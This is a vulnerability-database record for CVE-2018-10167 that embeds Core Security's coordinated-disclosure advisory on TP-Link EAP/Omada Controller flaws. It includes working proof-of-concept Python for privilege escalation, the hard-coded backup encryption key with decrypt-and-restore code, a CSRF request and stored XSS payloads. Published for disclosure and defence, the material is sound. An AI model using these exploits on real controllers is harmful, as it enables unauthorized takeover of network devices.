CVE-2018-10167 (GCVE-0-2018-10167)

Vulnerability from cvelistv5 – Published: 2018-05-03 18:00 – Updated: 2024-08-05 07:32

Summary

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

GHSA-G9P8-H989-GP6G

Vulnerability from github – Published: 2022-05-14 03:19 – Updated: 2022-05-14 03:19

Details

Severity ?

7.5 (High)


                  
                    CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2018-10167"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-05-03T18:29:00Z",
    "severity": "HIGH"
  },
  "details": "The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows.",
  "id": "GHSA-g9p8-h989-gp6g",
  "modified": "2022-05-14T03:19:29Z",
  "published": "2022-05-14T03:19:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10167"
    },
    {
      "type": "WEB",
      "url": "https://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/104094"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

VAR-201805-0361

Vulnerability from variot - Updated: 2024-11-23 22:06

The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkEAPController and OmadaController are software used by TP-LINK to remotely control wireless AP access point devices. A security vulnerability exists in the TP-LinkEAPController and the OmadaController 2.5.4_Windows version and the 2.6.0_Windows version of the web application backup file. The vulnerability is caused by the program encrypting with a hard-coded encryption key. TP-Link EAP Controller and Omada Controller are prone to the following security vulnerabilities: 1. A privilege-escalation vulnerability 2. A cross-site request-forgery vulnerability 4. Multiple HTML-injection vulnerability An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. The following products and versions are vulnerable: TP-Link EAP Controller 2.5.4 and 2.6.0 TP-Link Omada Controller 2.5.4 and 2.6.0. Advisory Information

Title: TP-Link EAP Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0001 Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities Date published: 2018-05-03 Date of last update: 2018-04-17 Vendors contacted: TP-Link Release mode: Coordinated release

Vulnerability Information

Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164

It allows you to centrally manage your EAP devices using a Web browser.

Vulnerabilities were found in the EAP Controller management software, allowing privilege escalation due to improper privilege management in the Web application. Also, the Web application does not have Cross-Site Request Forgery protection and finally, two stored Cross Site Scripting vulnerabilities were found.

Vulnerable Packages

. TP-Link EAP Controller_V2.5.4_Windows . TP-Link Omada Controller_V2.6.0_Windows Other products and versions might be affected, but they were not tested.

Vendor Information, Solutions and Workarounds

TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues.

Credits

This vulnerability was discovered and researched by Julian MuA+-oz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team.

Technical Description / Proof of Concept Code

TP-Link EAP Controller doesn't have any role control on the Web app API, only the application GUI seems to be restricting low lever users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices.

On 7.3 we show the application does not have any Cross-Site Request Forgery Protection giving an attacker the possibility of forcing an end user to execute any unwanted actions on the EAP Controller in which the victim is currently authenticated. Finally, we discovered two Cross-Site Scripting, one on the creation of a local user in the parameter userName (7.4) and the other one abusing the implementation of portalPictureUpload (7.5).

7.1. Privilege escalation from Observer to Administrator

[CVE-2018-10168] The software does not control privileges on the usage of the Web API, allowing a low privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user):

/----- import requests session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" #observer session_id cookie = {'TPEAP_SESSIONID': tpeap_session_id} data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"}

create user

create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False) -----/

The roleId parameter can be discovered in 7.2 by decrypting the backup file.

The following xml is part of the decrypted backup file, modifying those fields would give us control over the EAP device since we can inject a user and password for the user account and enable SSH on the device.

/----- { "id" : "5a09fad8bb62eef169069ad3", "userName" : "attacker", "password" : "1234567", "site" : "Default", "key" : "userAccount" } { "id" : "59fb411fbb62eef169069ac7", "sshserverPort" : 22, "sshenable" : true, "site" : "Default", "key" : "ssh" } -----/

The following code shows how this process is done, using an observer's session_id.

/-----

-- coding: utf-8 --

import requests import codecs

key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \

"3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \ "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX"

def init_key(secret_key): key_in_bytes = map(ord, secret_key) number_list = range(0, 256) j = 0 for i, val in enumerate(number_list): j = j + number_list[i] + key_in_bytes[i] & 0xFF temp = number_list[i] number_list[i] = number_list[j] number_list[j] = temp return number_list

def encrypt(data, key): key = init_key(key) input = [x for x in data] output = [] for x, elem in enumerate(data): i = 0 j = 0 i = (i + 1) % 256 j = (j + key[i]) % 256 temp = key[i] key[i] = key[j] key[j] = temp t = (key[i] + key[j] % 256) % 256 iY = key[t] iCY = iY output.append(chr(ord(input[x]) ^ iCY)) ret = ''.join(output) return ret

session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" cookie = {'TPEAP_SESSIONID': tpeap_session_id}

get backup file

get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False)

decrypt backup file

decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key)

modify decrypted backup file

patched_backup = decrypted_backup.replace('normaluser', 'attacker')

encrypt the file and save it

path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg" encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape') h = codecs.open(path_to_write, "w", encoding='utf-8') h.write(encrypt_patched_backup) h.close()

upload patched backup file

files = {'file': open(path_to_write, 'rb')} restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False) -----/

7.3. Lack of Cross-Site Request Forgery Protection

[CVE-2018-10166] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attack-controlled domain.

Proof of concept to create an Administrator User

/----- POST /user/addUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa Connection: close Upgrade-Insecure-Requests: 1

name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator -----/

7.4. Cross-Site Scripting in the creation of a local User

[CVE-2018-10165] The following parameter of the local user creation is vulnerable to a stored Cross Site Scripting: userName

The following is a proof of concept to demonstrate the vulnerability:

/----- POST /hotspot/localUser/saveUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en Connection: close Upgrade-Insecure-Requests: 1

userName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=123456 -----/

7.5. Cross-Site Scripting in portalPictureUpload

[CVE-2018-10164] The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting.

Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB)

In the following example we encode "alert(1)" in base64, the results is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" so we replace the fileData with the code and restore the backup file.

/----- 5a383b962dc07622f0bdc101 PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== -----/

To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example).

Report Timeline 2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send draft advisory. 2018-01-14: TP-Link answered asking for the advisory in clear text. 2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form. 2018-01-29: TP-Link informed Core Security they checked the draft advisory and they are going to fix the vulnerabilities. 2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and request an estimated release date for the fix. 2018-02-07: TP-Link informed that they were working in a beta version of the fix and they will provide it to Core Security for test. 2018-02-07: Core Security thanked TP-Link's answer and asked for a tentative date for this beta version. 2018-02-19: Core Security tested the beta version and verified that all the vulnerabilities were fixed. Also, Core Security asked for a tentative release date for the fix. 2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again. 2018-03-01: Core Security thanked TP-Link's answer and requested for a regular contact till the release of the fixed version. 2018-03-19: Core Security requested a status update. 2018-03-21: TP-Link confirmed that the new version will be available in early April. 2018-03-26: Core Security thanked TP-Link's reply an asked for a solidified release date. 2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities. 2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed. 2018-04-17: Core Security set release date to be May 3rd at 12 PM EST.
References

[1] https://www.tp-link.com/en/products/details/EAP-Controller.html. [2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software.

About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

About Core Security

Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com

Disclaimer

The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201805-0361",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "eap controller",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "tp link",
        "version": "2.6.0"
      },
      {
        "model": "eap controller",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "tp link",
        "version": "2.5.4"
      },
      {
        "model": "eap controller",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "tp link",
        "version": "2.5.4_windows"
      },
      {
        "model": "eap controller",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "tp link",
        "version": "2.6.0_windows"
      },
      {
        "model": "eap controller 2.5.4 windows",
        "scope": null,
        "trust": 0.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "eap controller 2.6.0 windows",
        "scope": null,
        "trust": 0.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "omada controller 2.5.4 windows",
        "scope": null,
        "trust": 0.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "omada controller 2.6.0 windows",
        "scope": null,
        "trust": 0.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "omada controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "tp link",
        "version": "2.6.0"
      },
      {
        "model": "omada controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "tp link",
        "version": "2.5.4"
      },
      {
        "model": "omada controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "tp link",
        "version": "2.6.1"
      },
      {
        "model": "eap controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "tp link",
        "version": "2.6.1"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "db": "BID",
        "id": "104094"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10167"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:tp-link:eap_controller",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Julian Munoz from Core Security Exploits QA",
    "sources": [
      {
        "db": "BID",
        "id": "104094"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2018-10167",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 6.8,
            "id": "CVE-2018-10167",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2018-10974",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 6.8,
            "id": "VHN-119899",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.6,
            "id": "CVE-2018-10167",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2018-10167",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2018-10167",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-10974",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201805-142",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-119899",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10974"
      },
      {
        "db": "VULHUB",
        "id": "VHN-119899"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004779"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-142"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10167"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkEAPController and OmadaController are software used by TP-LINK to remotely control wireless AP access point devices. A security vulnerability exists in the TP-LinkEAPController and the OmadaController 2.5.4_Windows version and the 2.6.0_Windows version of the web application backup file. The vulnerability is caused by the program encrypting with a hard-coded encryption key. TP-Link EAP Controller and Omada Controller are prone to the following security vulnerabilities:\n1. A privilege-escalation vulnerability\n2. A cross-site request-forgery vulnerability\n4. Multiple HTML-injection vulnerability\nAn attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. \nThe following products and versions are vulnerable:\nTP-Link EAP Controller 2.5.4 and 2.6.0\nTP-Link Omada Controller 2.5.4 and 2.6.0. **Advisory Information**\n\nTitle: TP-Link EAP Controller Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0001\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities\nDate published: 2018-05-03\nDate of last update: 2018-04-17\nVendors contacted: TP-Link\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Privilege Management [CWE-269], Use of Hard-coded\nCryptographic  Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper\nNeutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n(\u0027Cross-site Scripting\u0027) [CWE-79]\nImpact: Code execution, Security bypass\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165,\nCVE-2018-10164\n\n3. It allows you to centrally manage your EAP devices\nusing a Web browser. \n   \nVulnerabilities were found in the EAP Controller management software,\nallowing privilege escalation due to improper privilege management in the\nWeb application. Also, the Web application does not have Cross-Site Request Forgery\nprotection and finally, two stored Cross Site Scripting vulnerabilities\nwere found. \n   \n4. **Vulnerable Packages**\n\n. TP-Link EAP Controller_V2.5.4_Windows\n. TP-Link Omada Controller_V2.6.0_Windows\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nTP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the\nreported issues. \n\n6. **Credits**\n\nThis vulnerability was discovered and researched by Julian MuA+-oz from Core\nSecurity Exploits QA. The publication of this advisory was coordinated by\nAlberto Solino and Leandro Cuozzo from Core Advisories Team. \n   \n7. **Technical Description / Proof of Concept Code**\n\nTP-Link EAP Controller doesn\u0027t have any role control on the Web app API,\nonly the application GUI seems to be restricting low lever users (observer)\nfrom changing settings. The vulnerability presented in 7.1 shows how a\nlow privilege user (observer) can make a request and create a new\nadministrator user. Forcing a user to restore this backup (using 7.3) can give us\ntotal control over the managed devices. \n     \nOn 7.3 we show the application does not have any Cross-Site Request Forgery\nProtection giving an attacker the possibility of forcing an end user to\nexecute any unwanted actions on the EAP Controller in which the victim is\ncurrently authenticated. Finally, we discovered two Cross-Site Scripting,\none on the creation of a local user in the parameter userName (7.4) and\nthe other one abusing the implementation of portalPictureUpload (7.5). \n     \n7.1. **Privilege escalation from Observer to Administrator**\n\n[CVE-2018-10168]\nThe software does not control privileges on the usage of the Web API,\nallowing a low privilege user to make any request as an Administrator. \nThe following PoC shows the creation of a new Administrator, by just\nhaving the session cookie of an observer (lowest privilege user):\n     \n/-----\nimport requests\nsession = requests.Session()\nsession.trust_env = False\ntpeap_session_id = \"80ab613a-590c-47ac-a2d6-f2949a0e9daa\" #observer\nsession_id\ncookie = {\u0027TPEAP_SESSIONID\u0027: tpeap_session_id}\ndata = {\"name\": \"coresecurity\", \"roleId\": \"59fb411ebb62eef169069ac3\",\n\"password\": \"123456\",\n    \"email\": \"fakemail@gmail.com\", \"roleName\": \"administrator\"}\n\n#create user\n create_user_response =\nsession.post(\u0027https://EAP_CONTROLER_IP:8043/user/addUser\u0027,\ncookies=cookie, data=data, verify=False)\n-----/\n\nThe roleId parameter can be discovered in 7.2 by decrypting the backup file. \n       \nThe following xml is part of the decrypted backup file, modifying those\nfields would give us control over the EAP device since we can inject a\nuser and password for the user account and enable SSH on the device. \n\n/-----\n\u003cuseraccount\u003e\n {\n   \"id\" : \"5a09fad8bb62eef169069ad3\",\n   \"userName\" : \"attacker\",\n   \"password\" : \"1234567\",\n   \"site\" : \"Default\",\n   \"key\" : \"userAccount\"\n }\n\u003c/useraccount\u003e\n\u003cssh\u003e\n {\n   \"id\" : \"59fb411fbb62eef169069ac7\",\n   \"sshserverPort\" : 22,\n   \"sshenable\" : true,\n   \"site\" : \"Default\",\n   \"key\" : \"ssh\"\n }\n\u003c/ssh\u003e\n-----/\n\nThe following code shows how this process is done, using an observer\u0027s\nsession_id. \n       \n/-----\n# -*- coding: utf-8 -*-\nimport requests\nimport codecs\n\nkey =\n\"Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn\"\n\\\n     \n\"3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck\"\n\\\n      \"74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX\"\n\ndef init_key(secret_key):\n    key_in_bytes = map(ord, secret_key)\n    number_list = range(0, 256)\n    j = 0\n    for i, val in enumerate(number_list):\n        j = j + number_list[i] + key_in_bytes[i] \u0026 0xFF\n        temp = number_list[i]\n        number_list[i] = number_list[j]\n        number_list[j] = temp\n    return number_list\n\ndef encrypt(data, key):\n    key = init_key(key)\n    input = [x for x in data]\n    output = []\n    for x, elem in enumerate(data):\n        i = 0\n        j = 0\n        i = (i + 1) % 256\n        j = (j + key[i]) % 256\n        temp = key[i]\n        key[i] = key[j]\n        key[j] = temp\n        t = (key[i] + key[j] % 256) % 256\n        iY = key[t]\n        iCY = iY\n        output.append(chr(ord(input[x]) ^ iCY))\n    ret = \u0027\u0027.join(output)\n    return ret\n\nsession = requests.Session()\nsession.trust_env = False\ntpeap_session_id = \"80ab613a-590c-47ac-a2d6-f2949a0e9daa\"\ncookie = {\u0027TPEAP_SESSIONID\u0027: tpeap_session_id}\n\n#get backup file\nget_backup_response =\nsession.get(\u0027https://EAP_CONTROLER_IP:8043/globalsetting/backup\u0027,\ncookies=cookie, verify=False)\n\n#decrypt backup file\ndecrypted_backup = encrypt(unicode(get_backup_response.content,\n\u0027utf-8\u0027), key)\n\n#modify decrypted backup file\npatched_backup = decrypted_backup.replace(\u0027normaluser\u0027, \u0027attacker\u0027)\n\n#encrypt the file and save it\npath_to_write = r\"C:\\fake_path\\patched_backup_from_observer.cfg\"\nencrypt_patched_backup = unicode(encrypt(patched_backup, key),\n\u0027unicode-escape\u0027)\nh = codecs.open(path_to_write, \"w\", encoding=\u0027utf-8\u0027)\nh.write(encrypt_patched_backup)\nh.close()\n\n#upload patched backup file\nfiles = {\u0027file\u0027: open(path_to_write, \u0027rb\u0027)}\nrestore_backup_response =\nsession.post(\u0027https://EAP_CONTROLER_IP:8043/globalsetting/restore\u0027,\nfiles=files,\n                                       cookies=cookie, verify=False)\n-----/\n\n\n7.3. **Lack of Cross-Site Request Forgery Protection**\n\n[CVE-2018-10166]\nThere are no Anti-CSRF tokens in any forms on the Web interface. 